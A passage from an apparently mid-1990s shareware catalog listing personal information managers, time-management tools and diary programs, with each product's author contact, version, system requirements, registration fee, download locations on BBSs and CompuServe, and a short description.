Description: + Different! Designed exclusivesly to streamline your notetaking. + Easy to use; position anywhere - uses less than 10% of an SVGA + screen. Short-cut keys for DateStamp functions and all standard + Windows edit commands. AutoSave and AlwaysOnTop capabilities + make this the ideal desktop companion for the busy computer + user. Searchable, 30k capacity is ideal for holding a month or + more of that important random data. + + + 2.6.9 Personal information managers (PIMs) + + Product: 2DO Personal Task Manager + Author: William Anderson Consulting, 206-828-3675 + Version: 1.2 (06-01-94) + Needs: IBM PC, Windows 3.0 or better. VGA monitor; Hard disk. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Postscript printer; Hayes-compatible modem; Mouse; sound card. + Registration fee: $30.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; 2DOV12.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 12 (or contact userID 71662,545 + for assistance). + SWREG#: 1313 + PsL#: 10948 + Download size: 413k (about 31 minutes with a 2400 baud modem) + Description: + A personal task manager for Windows, allowing you to organize, + schedule, and view your To Do List of tasks through a robust + drag and drop interface. Works with tasks, not times, so it + works more the way you do. Windows Sources says it "provides + users with task-management solutions that are unequaled by any + commercial PIM I've seen". Software Creations calls it a + "powerful PIM, with considerable depth, and the interface is + intuitive and user friendly." + + Chapter 2, "Utilities" 166 + + + + Product: Above & Beyond + Author: 1Soft Corp., 707-987-0256 + Version: 3.1 (06-09-94) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $99.00 (add $5.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: ABOVE31.ZIP on BBSs (call 707-987-9580 to download it + at no charge); AB.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 12 (or contact userID 71240,1625 for assistance); + AB.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 405 + Download size: 270k (about 20 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, Shareware Industry Awards. + Description: + A powerful Windows PIM for managing your busy schedule. Its + unique dynamic scheduling makes planning your work and staying + organized quick and easy. Daily, weekly and monthly views. + Handles all types of recurring items. Timers, pop-up calendars, + alarms, etc. All completed items are logged. There's a contact + manager for addresses and phone numbers with auto-dialing and + notes space. You can even schedule programs to execute + automatically. Built-in LAN support for group scheduling. + + + Product: Around The House + Author: RMH Computer Services, 317-782-9903 + Version: 2.02 (06-26-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 1-month return policy; bonus utilities; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. 1 free update disk(s) sent out. + Look for: ATH202.ZIP on BBSs (call 317-784-2147 to download it at + no charge); ATH.ZIP on CompuServe in CIS:IBMAPP forum LIBrary 7 + (or contact userID 73567,1547 for assistance). + SWREG#: 1594 + Download size: 420k (about 31 minutes with a 2400 baud modem) + Description: + Complete household information manager. Maintain names, + addresses, phone numbers, birthdays, Christmas card lists, etc. + Print mailing labels from database. Track home inventory, + model/serial numbers, location, value. Keep notes, from recipes + to a personal diary. Track auto repair and maintenance. Shows + income, expenses, and "what's left". Many pre-defined reports; + allows user-defined reports. Has an appointment calendar and + basic "word processor" for mail-merge letters. Context- + sensitive help. + + Chapter 2, "Utilities" 167 + + + + Product: BusinessCards for Windows + Author: Michael Dvorkin, 415-588-6215 + Version: v2.01 (05-10-94) + Needs: IBM AT (80286), Windows 3.1 or better. 1k RAM; VGA + monitor. + Registration fee: $19.95 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; bonus utilities; + bonus data; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: availability unknown on BBSs; BCARD*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 73773,2527 + for assistance). + SWREG#: 2483 + PsL#: 11305 + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + Powerful, compact and easy to use free form database program + for Windows. There are no predefined forms or record layouts - + you decide how to store and present data. Elegant folio like + user interface with tabs and flipping pages. Reads/writes + Windows Cardfile files. Data exchange with most personal + databases Guaranteed to put you into productivity within + minutes! + + + Product: Calendar Mate + Calendar/tickler that can print calendars. See full + description on page 149. + + Product: ChronoLog + Author: ComputerEase, 804-458-2212 + Version: 1.11 (09-15-93) + Needs: IBM PC, DOS 2.11 or better. 256k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Hayes-compatible modem. + Registration fee: $35.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 12-month return policy; site license; all ASP-wide + offers (see page 6). + Look for: CHRON111.ZIP on BBSs; CHRON1.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 6 (or contact userID 71221,2766 for + assistance); CHRON111.ZIP on GEnie in IBMPC forum LIBrary 15. + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + A personal information/resource management system for DOS. + Features easy entry of eleven event types, reminding, logging/ + recall by category, quick searching, resource utilization and + conflict-checking, printing of appointment schedules and + monthly block calendars on any printer, export/import, phone + directory with autodial, calculator, todo list, DOS shell. This + + Chapter 2, "Utilities" 168 + + + + system won the 1991 Dept of Defense Software Contest and has + been much improved. Extremely easy to use. + + + Product: Contact Browser [***] + Contact manger/phone dialer. See full description on page 154. + + Product: Contact Manager + Manage contact names & phone numbers. See full description on + page 159. + + Product: Contact-Lens! + Author: Kruse Control Software, 201-670-0677 + Version: 2.3 (04-15-94) + Needs: IBM PC, DOS 3.2 or better. 450k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; bonus utilities; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products; + discounts on upgrades. + Look for: availability unknown on BBSs; CL.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 70324,1034 for + assistance). + PsL#: 11026 + Download size: 410k (about 31 minutes with a 2400 baud modem) + Description: + Fast Personal Information Manager (PIM) runs under DOS/Windows, + icon included: 7 screens/contact, 22 search fields, context- + sensitive help windows & online manual, flexible import/export + program. + + Chapter 2, "Utilities" 169 + + + + Product: DARN! Don't Forget! + Author: EmmaSoft Software Company, Inc., 607-533-4685 + Version: 4.00 (05-31-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $39.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, BBS, CompuServe, newsletter, mail support; + 1-month limited return policy; bonus utilities; bonus data; all + ASP-wide offers (see page 6); discounts on upgrades. + Look for: DARNW40.ZIP on BBSs (call 607-533-7072 to download it + at no charge); DARNW40.ZI on CompuServe in CIS:PCUTIL forum + LIBrary 7 (or contact userID 71333,1577 for assistance). + Download size: 463k (about 35 minutes with a 2400 baud modem) + Description: + Did you forget the Boss's birthday? Your Mom's anniversary? + Darn! reminds you of all your important events every day. You + set it for the number of days to look ahead so you'll have + plenty of time to buy gifts and cards. Handles 7 kinds of + events including annual, monthly, bi-monthly, weekly, every- + other-weekly, x day of y month, and appointments. Includes a + special holiday data base and recommends anniversary gifts. + Prints the events list. + + + Product: Day By Day + Author: Q&D Software Development, 201-635-1824 + Version: 1.3 (05-05-95) + Needs: IBM PC, DOS 3.3 or better. 4000k RAM; Hard disk; Mouse; + XMS memory; VBRUN300.DLL. + Strongly recommended: VGA monitor. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 6). Lifetime free upgrading allowed. + Look for: DBD13.ZIP on BBSs; DBD.ZIP on CompuServe in CIS:WINAPD + forum LIBrary 1 (or contact userID 76336,3271 for assistance). + SWREG#: 3923 + PsL#: 11688 + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + A full featured PIM, including scheduler, task list manager, + and diary sections. All data is password protected. Create + master task list to allow for easy entry of recurring tasks and + default scheduling on a weekly basis. Diary section includes + text search feature, allowing you to view all journal entries + pertaining to specific person, place, event, etc., and allows + for up to 64k of notes per day. Includes full on-line, context + sensitive Windows Help system. + + Chapter 2, "Utilities" 170 + + + + Product: DayMaster + Author: Unicorn Software Limited, 816-429-3558 + Version: 4.10 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: DAYM410.ZIP on BBSs (call 317-784-2147 to download it + at no charge); DAYMST.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 79 + Download size: 304k (about 23 minutes with a 2400 baud modem) + Description: + Provides user with trivia, birthdays, anniversaries for a + particular date, and allows user to include their own + information for any date. It also gives a quote for the day, + and informs user of any reminders the user might have entered. + Reminder feature works for weekly/monthly/daily/annual/single + or range of dates basis. All of this can take place at boot up + or any other time user activate the program. The permanent data + file contains over 3000 historical events and 1000 quotes. Also + BBS option. + + + Product: dbDIAL(tm) + 7k TSR database/dialer. See full description on page 159. + + Product: DR. Memory + Easy, powerful, tickler/reminder program. See full description + on page 162. + + Chapter 2, "Utilities" 171 + + + + Product: Folders + Author: Target Software, +81-3-3207-4553 + Version: 2.0 (03-22-95) + Needs: IBM AT (80286), Windows 3.1 or better. SVGA monitor; + Hayes-compatible modem; Mouse; VBRUN300.DLL. + Strongly recommended: Network (LAN); XMS memory. + Registration fee: $38.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: FOLDERS.ZIP on BBSs; FOLDERS.ZIP on GEnie in 1212 forum + LIBrary 0. + SWREG#: 4013 + PsL#: 14097 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + A powerful method to keep track of both your personal and + business information. You can keep an unlimited amount of + information(address', personal information, notes, etc.). You + can also connect to your network and send email to your + associates. Comes with image viewer that allows you to view + documents as you talk on the phone. Send faxes with Winfax. + Find you appointments and clients easily with a power search + method. Print out you records and appointments with custom + prints. + + + Product: FYI/For Your Eyes Only + Resumer writer/Address book/memo writer. See full description + on page 249. + + Product: FYI2/Business Office Manager + Employee database, address book, business. See full + description on page 249. + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 290. + + Product: HouseHold TRACKER + Inventory household items. See full description on page 279. + + Product: ListBuilder + Author: Younkin Enterprises, 609-262-1097 + Version: 1.1 (06-27-95) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM; EGA monitor; + Hard disk; Mouse. + Strongly recommended: Modem. + Registration fee: $29.00 + Registration benefits: Full program functionality; 3 months of + unlimited phone, CompuServe, mail support; lifetime return + policy; bonus utilities; bonus data; all ASP-wide offers (see + + Chapter 2, "Utilities" 172 + + + + page 6); discounts on upgrades; registration commissions. + 3-month free upgrading allowed. + Look for: availability unknown on BBSs; LISTBLD1.ZIP on + CompuServe in CIS:WORK forum LIBrary 5 (or contact userID + 72074,1611 for assistance). + SWREG#: 5753 + PsL#: 11994 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Easy-to-use Contact Manager that can be customized to your + "networking" needs. Ready to use, just add your contacts! + Standard features: Demographic info, directions (to home/work), + speed dial, calendar, personalized drop-down boxes, reports & + labels. Special features: customize your lists into catagories + you setup. Also, build a large list of names by "brainstorming" + to associate names / places / occupations with people you know. + + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 155. + + Product: MDS OBRA ASSESSMENT TOOL + Author: PC-DSD, 800-427-8123 + Version: 2.4 (01-10-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $275.00 + Registration benefits: Three months phone support, one year of + free updates. + Look for: M1V23U.ZIP on BBSs (multiple files) (call 714-681-6221 + to download it at no charge); M1V23U.ZIP on CompuServe in + CIS:MEDSIG forum LIBrary 4 (multiple files) (or contact userID + 70742,2473 for assistance). + Download size: 780k (about 58 minutes with a 2400 baud modem) + Description: + A complete quality control program meeting the latest OBRA + guidelines. Featuring: from A-Z quality control programs areas + include MDS face sheet, MDS assessment, RAP summary, resident + care planning system, obra reports, inhouse reports + computerized formats and standard formats. Admissions and + discharges record collection. Personal phone directory, memo + writer, icd_9cm codes, special function menu, inter-office + memos, resident skin, psychotropic records reports. + + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 397. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 355. + + Chapter 2, "Utilities" 173 + + + + Product: Personal Calendar (PC) for DOS + Author: FunStuff Software, 703-435-1110 + Version: 14.71 (11-18-94) + Needs: IBM PC, DOS 3.0 or better. 6k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Operates with DOS 2.1 if not used as a TSR. + Strongly recommended: Hard disk; EMS memory. + Registration fee: $39.00 (add $4.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, fax, BBS, CompuServe, mail + support; 3-month limited return policy; bonus utilities; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: PCAL1471.ZIP on BBSs (call 703-323-6423 to download it + at no charge); PERCAL.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 7 (or contact userID 71141,1224 for assistance). + SWREG#: 280 + PsL#: 10115 + Download size: 192k (about 14 minutes with a 2400 baud modem) + Description: + Friendly Personal Information Manager (PIM) displays a 3-month + scrollable calendar, a running analog/digital clock, a time- + oriented event list of your appointments, and your notes. + Printable for pocket/purse. Keeps a historical diary. Warnings + and alarms tell when events are pending or overdue. Flexible + menu interface, run as a TSR or normal program. TSR can + interrupt you at the earliest event. Extremely stable, + environment sensitive TSR is a 6K kernel, with the balance + swapped to EMS or disk. + + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 151. + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 352. + + Chapter 2, "Utilities" 174 + + + + Product: REMInder + Author: Michael G. Bruckner, 614-761-2966 + Version: 1.2 (01-01-93) + Needs: IBM PC, DOS 3.2 or better. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of mail support; 3-month return policy; all ASP-wide + offers (see page 6). + Look for: REMI12.ZIP on BBSs (call 715-652-2758 to download it at + no charge); REMI12.EXE on CompuServe in CIS:IBMSYS forum + LIBrary 0. + Download size: 34k (about three minutes with a 2400 baud modem) + Description: + A tickler program to help you remember dates and events. You + enter messages and the dates to begin to be reminded of each. + At subsequent startups, the program automatically searches for + dates that match or are older than the current date and shows + the corresponding messages. Searches can be conducted using + the following methods: (1) current messages - today or older, + (2) date, (3) text, or (4) show all. New messages can be added + at any time, and existing messages are easily edited. + + + Product: ROLLCALL.DBMS + Author: PC-DSD, 800-427-8123 + Version: 3.5 (03-12-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $69.95 + Registration benefits: Three months phone support, one year of + free updates. + Look for: ROLV35.ZIP on BBSs (call 714-681-6221 to download it at + no charge); ROLV35.ZIP on CompuServe in CIS:IBM forum LIBrary 2 + (or contact userID 70742,2473 for assistance). + Download size: 760k (about 57 minutes with a 2400 baud modem) + Description: + A complete hospital employee tracking system. Specially + designed for hospital use. Can track all phases of employee + hospital records from hire to term. Including hbv consents. If + you are in a business where tracking employee progress is + important this is for you. Automates your employee data + collection. Takes the pain out of human resources management by + organizing and reporting your information in an easy access + format. + + + Product: TASK MASTER + Project tracking program. See full description on page 353. + + Chapter 2, "Utilities" 175 + + + + Product: TC's Personal Data Manager + Author: Specific Applications Software, 612-722-9659 + Version: 1.20 (02-17-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Strongly recommended: EGA monitor; Modem. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of CompuServe, mail support; discounts on upgrades. + Look for: availability unknown on BBSs; PDM120.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 16 (or contact userID 76470,3424 for + assistance). + SWREG#: 4773 + PsL#: 11839 + Download size: 1036k (about 77 minutes with a 2400 baud modem) + Description: + Features full month display of calendar with special events + that you choose. Phone/address book to keep your list of phone + numbers, can be sorted by last name or company name. Phone + dialer dials numbers directly from the phone book using your + modem. Call timer is provided to time the length of your calls. + To do lis helps keep track of important tasks. Note pad is used + to write notes & edit small text files. Almanac contains + information such as measurement conversions & ZIP codes. + + + Product: Tikler + Author: Olsen Outdoors, 508-486-3985 + Version: 5.3 (08-05-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Hard disk. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products. + Look for: TIKLER53.ZIP on BBSs (call 508-875-3618 to download it + at no charge); TIKLER.ZIP on CompuServe in CIS:IBMAPPS forum + LIBrary 7 (or contact userID 70031,534 for assistance). + Download size: 67k (about five minutes with a 2400 baud modem) + Description: + A fast, easy to use tool to keep track of your busy schedule. + Supports passwords, file encryption, European date format, + event duplication (weekly, monthly etc.) and time sorting. Runs + as a TSR, if desired, using as little as 6k of memory. Also + runs in conventional mode. Great for laptop and notebook + machines. + + Chapter 2, "Utilities" 176 + + + + Product: Visual Calendar Planner + Author: Bok Nan Lo + Version: 1.1 (02-10-94) + Needs: IBM PC, Windows 3.0 or better. 1000k RAM. + Registration fee: $19.95 + Registration benefits: lifetime unlimited CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on + upgrades. 6-month free upgrading allowed. 2 free update + disk(s) sent out. + Look for: availability unknown on BBSs. + PsL#: 11042 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + The easiest calendar planner program to use, virtually + negligible learning curve. If you think you cannot handle a + sophisticated PIM, try using this. A powerful, yet extremely + easy to use calendar planner. Guaranteed to put you into + productivity within minutes after using it. Complete and real + 3D look that resembles a desktop planner found on most office + desktop. + + + Product: WhizNotes + A text organizer & help generator for Windows. See full + description on page 233. + + Product: WinPost + Author: Eastern Mountain Software, 206-391-3483 + Version: 3.2b (07-01-93) + Needs: IBM AT (80286), Windows 3.0 or better. + Registration fee: $30.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited support. + Look for: availability unknown on BBSs; WPST32.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 12 (or contact userID 71570,533 + for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Use to get rid of your Post-it(tm) notes! This Windows utility + allows the user to create and manage reminder notes. Icon Tool + Bar, mouse shortcuts and accelerator keys make this a very + intuitive and easy-to-use utility. Major features include OLE + server support, print facility, search facility, alarm notes, + numerous configuration parameters, auto save, and more. + Recipient of coveted PC Magazine's "Best of 1991 Award" + (1/14/92 issue). A must for Windows users! + + Chapter 2, "Utilities" 177 + + + + 2.6.10 Time management + + Product: Above & Beyond + PIM for planning, managing your time. See full description on + page 165. + + Product: Calendar Mate + Calendar/tickler that can print calendars. See full + description on page 149. + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 167. + + Product: Contact-Lens! + Extremely fast contact manager/PIM. See full description on + page 168. + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 169. + + Product: DR. Memory + Easy, powerful, tickler/reminder program. See full description + on page 162. + + Product: Early Bird + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0f (03-01-95) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, BBS, CompuServe, mail + support; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: EBIRD10F.ZIP on BBSs (call 312-922-2839 to download it + at no charge); EBIRD*.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 17 (or contact userID 71532,3271 for assistance). + SWREG#: 4941 + PsL#: 11841 + Download size: 178k (about 13 minutes with a 2400 baud modem) + Description: + A home and business calendar/reminder program that is easy to + use, flexible, and powerful. It features simple or complex + reminder types, desktop calendar and scan modes, color pull- + down and pop-up menus, and context sensitive on-line help. + + Chapter 2, "Utilities" 178 + + + + Product: Personal Calendar (PC) for DOS + TSR PIM appointment reminder, clock, calendar. See full + description on page 172. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 151. + + Product: Personal Time Card + Author: Fischer Grafix & Software, 714-898-7262 + Version: 2.6 (10-29-93) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Mouse. + Registration fee: $18.50 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; + discounts on other products. + Look for: FGSPTC.ZIP on BBSs; FGSPTC.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 6 (or contact userID 70233,1315 for + assistance). + Download size: 265k (about 20 minutes with a 2400 baud modem) + Description: + Keep your project time organized either daily or weekly. Keeps + your time cards in order of date and allow entries for job + number (project), description and time (regular and overtime). + Prints the cards for hard copies and back-up your files to + diskette. Multiple users need only create a directory for each + user to store files. + + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 352. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 344. + + Product: Tikler + A fast, easy event reminder. See full description on page 175. + + Product: TimeClock + Computer usage time tracking and reporting. See full + description on page 345. + + Chapter 2, "Utilities" 179 + + + + Product: Yellow Sticky for Windows 3.1 + Author: Henning Associates, 804-823-6896 + Version: 4.00 (06-17-95) + Needs: IBM 80386, Windows 3.1 or better. 90k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; runtime license; all ASP- + wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; YLWSTK40.ZIP on + CompuServe in CIS:WINSHAR forum LIBrary 0 (or contact userID + 72176,2507 for assistance). + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + Not a scheduler or day planner but a program to help you + organize your day and get tasks done that need to be done. + Provides current and next month windows, a "To Do" list for + today and for the scheduled date. When put in the StartUp + group, it lets the user see what needs to be done when his/her + computer is turned on. + + + 2.6.11 Journal/diary programs + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 149. + + Product: ChronoLog + Personal info/resource mgmt system for DOS. See full + description on page 167. + + Chapter 2, "Utilities" 180 + + + + Product: Cumberland Diary + Author: Cumberland Family Software, 615-647-4012 + Version: 1.3 (01-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; CGA monitor; + Hard disk. + Registration fee: $20.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; 2-month return policy; bonus utilities; all ASP-wide + offers (see page 6); discounts on other products. + Look for: availability unknown on BBSs; CDRY13.ZIP on CompuServe + in CIS:ROOTS forum LIBrary 3 (or contact userID 70713,3476 for + assistance). + Download size: 199k (about 15 minutes with a 2400 baud modem) + Description: + Powerful diary/ journal entry program with pull-down menus and + on-line help. Wordprocessor with cut & paste features, optional + password protection. Headings can be included for each entry. + ASCII import and export. Multi-entry text search. + + + Product: Daily Log Book + Author: Sequential Software, Inc., 606-423-5454 + Version: 2.1 (09-01-93) + Needs: IBM PC, DOS 3.1 or better. 350k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; Mouse. + Registration fee: $18.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; lifetime return policy; + all ASP-wide offers (see page 6). 3-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: LOG21.ZIP on BBSs (call 606-561-5766 to download it at + no charge); LOG21.ZIP on GEnie in IBMPC forum LIBrary 3 (or + contact userID J.HAYNES1 for assistance). + Download size: 173k (about 13 minutes with a 2400 baud modem) + Description: + Diary or journal program. One or six month view calendar for + selecting date. Allows 300 lines of text per day. Subject may + be seperated in up to 99 different log books, each may have its + own password. Other features include search/printing, cut/ + paste editing, program password (in addition to individual log + book passwords), daily reminders, macros, time stamping, and + extensive context sensitive help. + + + Product: Day By Day + Scheduler, diary, task manager with password. See full + description on page 169. + + Chapter 2, "Utilities" 181 + + + + Product: Dear Diary + Author: Q&D Software Development, 201-635-1824 + Version: 3.0 (06-22-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: DIARY30.ZIP on BBSs; DIARY.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 3178 + PsL#: 11664 + Download size: 755k (about 56 minutes with a 2400 baud modem) + Description: + An innovative diary/daily journal program. It allows you to + enter up to 64000 characters of notes per day. Includes text + search feature enabling you to zero in on dates in which you + entered information about specific people, events, etc. + Includes full on-line context sensitive Windows help system. + Data is stored in MS-Access 2.0 format for easy portability to + other applications. Supports international date formats. + + + Product: The Fish Expert + Finds fishing techniques; log, library tools. See full + description on page 623. + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 290. + + Product: LessonPlanZ + Lesson planning made easy. See full description on page 526. + + Product: My Life + Diary and Journal for young & old alike. See full description + on page 637. + + Chapter 2, "Utilities" 182 + + + + Product: OMNIDay + Author: Unicorn Software Limited, 816-429-3558 + Version: 4.30 (10-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: ODAY430.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + SWREG#: 64 + Download size: 371k (about 28 minutes with a 2400 baud modem) + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 5000 lines long. User can update + and delete entries. Will print out opus for selected dates or + all. Full featured text editor with on line help. Import + feature for those who travel. Includes diary keeping tips. + + + Product: OMNIDay For Windows + For recording your thoughts & memoirs. See full description on + page 252. + + Product: Tikler + A fast, easy event reminder. See full description on page 175. + + Product: WinJottr + Instant access desktop notetaker. See full description on + page 164. + + + 2.7 Menu systems & file managers + + See also: Utilities, Security programs, Computer access + security; Communications, Networks. + + 2.7.1 Menu systems + + Product: A Batch View + Menus/msgs/info/utilities for DOS batch files. See full + description on page 